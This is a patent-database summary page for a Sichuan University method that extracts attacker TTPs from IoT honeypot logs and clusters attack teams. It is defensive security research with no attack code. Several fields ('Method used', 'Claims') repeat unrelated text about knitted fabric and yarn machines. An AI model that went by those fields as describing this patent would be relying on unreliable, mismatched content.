TTP automatic extraction and attack team clustering method

A team and clustering technology, applied in the field of TTP automatic extraction and attack team clustering

Active Publication Date: 2020-08-14
SICHUAN UNIV
View PDF4 Cites 7 Cited by
  • Summary
  • Abstract
  • Description
  • Claims
  • Application Information

AI Technical Summary

Problems solved by technology

The present invention uses four feature groups (TTP, time, IP, and URL) extracted from log data to characterize different behaviors of attackers from different dimensions, thereby solving the challenge of describing personal attack behaviors when observing and predicting IoT attacks

Method used

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
View more

Image

Smart Image Click on the blue labels to locate them in the text.
Viewing Examples
Smart Image
  • TTP automatic extraction and attack team clustering method
  • TTP automatic extraction and attack team clustering method
  • TTP automatic extraction and attack team clustering method

Examples

Experimental program
Comparison scheme
Effect test

Embodiment Construction

[0014] The present invention will now be further described in conjunction with the accompanying drawings and specific embodiments. Such as figure 1 Shown is a block diagram of the invention. First, the framework captures attacks from the Internet, generates raw data, and extracts features from specific fields such as timestamp, payload, and time zone. Second, it enriches these features. For example, when generating a TTP signature group, it divides the payload into commands, maps these commands to the ATT&CK framework, and then generates an abstract syntax tree of the commands for a second mapping to techniques and tactics. After all feature groups are generated, these string-type features can be vectorized using encoding and TF-IDF. Then, it combines all the eigenvectors and clusters these attackers using a hierarchical clustering algorithm. Finally, the framework utilizes the payloads owned by each attacking team to create an attack tree to visualize team behavior. Nod...

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to view more

PUM

No PUM Login to view more

Abstract

The invention relates to a TTP automatic extraction and attack team clustering method. Along with increasingly popularization of advanced persistent threats in the global range, the Internet of Thingsis directly exposed to the Internet due to poor security, so that the Internet of Things becomes an excellent weapon for a hacker organization to initiate APT attacks. Therefore, an attacker can establish a botnet by using the attacked Internet of Things device and initiate an APT attack by using the botnet. The invention provides a framework for observing and predicting attacks of the Internet of Things. The framework aims at automatically extracting technologies, tactics and processes of attackers and mining potential attacker teams behind a large number of attacks. Firstly, related fieldsare extracted from captured Internet of Things honeypot logs; and then, the attack behavior is mapped to an ATT & CK framework to realize TTP automatic extraction. Furthermore, the method generates four feature groups including 18 features including TTP, time, IP and URL, potential attack groups are mined through specific hierarchical clustering, and finally, an attack tree is generated for each attacker cluster so as to better describe team attack behaviors.

Description

technical field [0001] The present invention relates to the field of network security, in particular to a method for automatic TTP extraction and attack team clustering, which is used to describe the behavior characteristics of attackers and dig out potential attack teams behind the attack. Background technique [0002] Kaspersky’s Global Research and Analysis Team (GReAT) notes that advanced persistent threat (APT) campaigns have become increasingly sophisticated and damaging since hacking groups launched targeted attacks on critical infrastructure and attempted to compromise central networks sex. At the same time, IoT devices have become the number one security threat to personal privacy, corporate information security, and even critical infrastructure because IoT devices are inherently risky, easily exploited, and exposed to the Internet in large quantities. Worse, attackers can leverage open source tools to quickly assemble malware scans, infiltrate and take control of ...

Claims

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to view more

Application Information

Patent Timeline
no application Login to view more
Patent Type & Authority Applications(China)
IPC IPC(8): H04L29/06G06K9/62
CPCH04L63/1416H04L63/1491H04L63/1425G06F18/232
Inventor 黄诚吴怡欣
Owner SICHUAN UNIV
Who we serve
  • R&D Engineer
  • R&D Manager
  • IP Professional
Why Eureka
  • Industry Leading Data Capabilities
  • Powerful AI technology
  • Patent DNA Extraction
Social media
Try Eureka
PatSnap group products

Browse by: Latest US Patents, China's latest patents, Technical Efficacy Thesaurus, Application Domain, Technology Topic.

© 2024 PatSnap. All rights reserved.Legal|Privacy policy|Modern Slavery Act Transparency Statement|Sitemap